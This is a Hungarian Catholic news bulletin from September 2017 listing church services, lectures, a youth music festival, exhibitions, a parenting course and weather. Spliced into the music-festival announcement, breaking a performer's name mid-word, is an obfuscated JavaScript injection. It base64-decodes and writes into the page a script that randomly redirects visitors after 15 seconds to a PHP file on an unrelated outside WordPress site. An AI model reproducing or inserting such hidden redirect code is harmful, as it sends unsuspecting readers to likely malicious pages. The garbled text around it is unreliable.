2017. szeptember 18. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a holnapi nap folyamán a nagyszebeni Szent Orsolya-templomban tartják az örökös szentségimádási napot. Szemléljük, engeszteljük és imádjuk Krisztust, a legméltóságosabb Oltáriszentségben!

Előadás Nagykárolyban
Szeptember 20-án, szerdán délután öt órától a nagykárolyi Fatimai Szűz Mária-templomban előadást tart Hajlák Attila István, a kézdivásárhelyi Boldog Özséb plébánia segédlelkésze Egy élet a Szűzanya ölelésében címmel.

Szent László Regionális Találkozó a nagyváradi Kapucinus Templomban
Szeptember 21-én, csütörtökön a nagyváradi Kapucinus Templomban tartják a hatodik Szent László Regionális Találkozót, amit a Nagyváradi Római Katolikus Püspökség kezdeményezett az alapító király szentté avatásának 825. évfordulóján meghirdetett Szent László Évben. Délután fél hat órakor a plébániatemplomban találkoznak az egyházmegye román nyelvű hívei, majd a szent király életpéldáját kiemelve tanúságtételeket, tapasztalatokat osztanak meg egymással a zarándokok. A találkozót fél hét órakor egy Szent László király tiszteletére bemutatott szentmise zárja, melynek főcelebránsa a megyés püspök, szónoka pedig Jitaru Szél Antal belényesi plébános lesz.

Szent Pio ünnepe
2017. szeptember 22-én, pénteken a székelyudvarhelyi Szent Pio Lelkigyakorlatos Ház kápolnájában délután hat órától ünnepi szentmisét tartanak. A szentmise főcelebránsa és szónoka Albert István-Csaba újmisés, szászrégeni segédlelkész. Ezt követően László Attila szombatfalvi plébános előadását hallgathatják meg az érdeklődők.

Ő az út! – Ifjúsági keresztény zenefesztivál
Marosszentgyörgyön szeptember 23-án, szombaton délután négy órakor kezdődik az Ő az út! Ifjúsági keresztény zenefesztivál. Az előadok között ott lesz a Stone Hill zenekar, Pora Zoli, aki gyerekdalokkal szólítja meg a kisebbeket, Sipos Tiffany, CSIT bfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');and, és Pintér Béla. Az eseményről bővebben a facebook-on olvashatnak. A belépés díjtalan!

Időjárás: Szeptemberhez képest hűvösebb, gyakran szeles időt tartogat a hét nagy része, és esőre, záporokra is több alkalommal készülhetünk.
Holnapra ismét hidegfront érkezik, így jobbára borult lesz az ég, nyugaton, délnyugaton süthet még ki hosszabb időszakokra a nap. Az ország nagy részén kell esőre, záporokra számítani, északnyugaton akár zivatar is előfordulhat. Délkeleten erős déli, másutt élénk északi, északkeleti szél várható. 7-13 fokos reggel után napközben 17-28 fokot mérhetünk.

MRE - Hírszolgálat, 2017. szeptember 18.


H Í R E K   R E G G E L / D É L B E N

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a bodolai templomban tartják az örökös szentségimádási napot. Szemléljük, engeszteljük és imádjuk Krisztust, a legméltóságosabb Oltáriszentségben!

Romániai Katolikus Püspöki Konferencia plenáris ülése
A Romániai Katolikus Püspöki Konferencia plenáris ülését szeptember 18-20. között Jászvárosban (Iaşi) tartják. Jelen alkalom sorrendben a hatvanharmadik lesz. A konferenciát jelenlétével megtiszteli Vatikán bukaresti nagykövete, Miguel Maury Buendía érsek, Románia és a Moldovai Köztársaság apostoli nunciusa, illetve Dario Vigano, a Szentszék társadalmi kommunikációért felelős titkárságának prefektusa is. Az eseményen részt vesz Kisjenő (Chişinău) római katolikus püspöke, Anton Coşa is. Kísérjük imáinkkal a konferencia ülését.

II. Szakrális művészetek hete Csíksomlyón
Szeptember 19-én, kedden este fél 8 órától, a szentmise után a csíksomlyói kegytemplomban orgonakoncert lesz Lászlóffy Árpád székelyudvarhelyi orgonaművész előadásában.
Szeptember 20-án, szerdán szintén este fél 8 órától a Kájoni Cantionale Catholicum gyűjteményből énekek és szövegek fognak elhangzani. Előadja: Győrfi Erzsébet, közreműködnek: Molnár Anna, Bíró János és Bilibók Attila.

Üzenet a szakralitásból – kiállítás Kolozsváron
Első alkalommal rendeznek Ars Sacra kiállítást Kolozsváron, szeptember 16–24. között. 23 hivatásos képzőművész saját meglátásán keresztül értelmezi az Üzenet a szakrálisból témát. A kiállítás naponta 11 és 15 óra között látogatható a Szentegyház utca 2 szám alatti tetőtéri kiállítóteremben.

120 éve született Tamási Áron
Szeptember 20-án a sepsiszentgyörgyi színház névadóját, Tamási Áront ünnepeli egy egész napos rendezvénysorozattal. A 120 éve született Tamási Áron művei és szellemisége az elmúlt évtizedekben tökéletesen beépültek a társulat működésébe, és utakat nyitottak afelé a korszerű és érvényes színjátszás felé, amit jelenleg képviselnek. Szeptember 20-án délután hat órától a kamarateremben felolvasó est lesz Tamási Áron novelláiból, majd este nyolc órától Dresch Kwintett koncert a nagyteremben.

Könyvbemutató Csíkszeredában
Bodó Márta Nőszirom. Beszélgetések keresztény értelmiségi nőkkel című interjúkötetét mutatják be Csíkszeredában szeptember 21-én, csütörtökön délután hat órától a Hargita Megyei Kulturális Központban (Temesvári sugárút 4 szám). A szerzővel Gálfalvi Ágnes szerkesztő beszélget. Várnak minden érdeklődőt!

ONline szülő vagyok? – KALOT képzés Csíksomlyón
A KALOT szervezésében Online szülő vagyok? címmel képzést tartanak szeptember 23-án, reggel kilenc és este nyolc óra között az egyesület székhelyén (Csíkszereda, Szék útja 147). Az egynapos tréning célja, hogy a szülők képesek legyenek a gyerekeik számára megmutatni az internet adta lehetőségeket, és kezelni tudják az információs eszközök használata körüli családi konfliktusokat. A program keretében Kis Orsolya pszichológus, informatikus hallgató segítségével a szülőket készítik fel az internet-használat tudatos szabályozására, támpontokat mutatnak a biztonságos internetezéshez és ahhoz, hogy időben észleljék a veszélyben lévő gyerek jelzéseit. A képzés során pszichológiai és informatikai segítséget egyaránt nyújtanak, lehetőség lesz konkrét problémák átbeszélésére, de szűrőprogramok telepítésre is különböző informatikai eszközökre (a szülőket kérik, hogy hozzanak magukkal egy okos eszközt, ez lehet telefon, táblagép, laptop). Részvételi hozzájárulás: 35 lej (tartalmazza a közös ebéd költségét is). Érdeklődni és jelentkezni a 0758 840 279-es telefonszámon vagy az iroda@kalot.ro e-mail címen lehet szeptember 20-ig. A helyek száma korlátozott.

Orvos, gyógyítsd meg önmagad!
Október 6 – 7-én a székelyudvarhelyi Szent Pió Lelkigyakorlatos Házban tartják az orvosok és orvostanhallgatók lelkigyakorlatát: „Orvos, gyógyítsd meg önmagad!” címmel. A lelkigyakorlat témája Utunk a tékozló fiútól a jobb lator bűnbánatáig. Tanúságot tesz Dr. Csókay András budapesti idegsebész főorvos és felesége Daniella. A részvételhez előzetes bejelentkezés szükséges október 1-ig. Bővebb információ a 0266-210537 és a 0755-489743 telefonszámokon, illetve a hazpio@gmail.com e-mail címen.

Időjárás: Ma csökken a felhőzet, a levegő 3-11 fokig hűl le. Napközben nyugaton lesz kevesebb napsütés, itt délutántól eső, zápor, akár zivatar is kialakulhat. A szél csak néhol élénkülhet meg. A csúcshőmérséklet 20-26 fok között alakul.  

MRE - Hírszolgálat, 2017. szeptember 18.

About the author

maradmin

Leave a Comment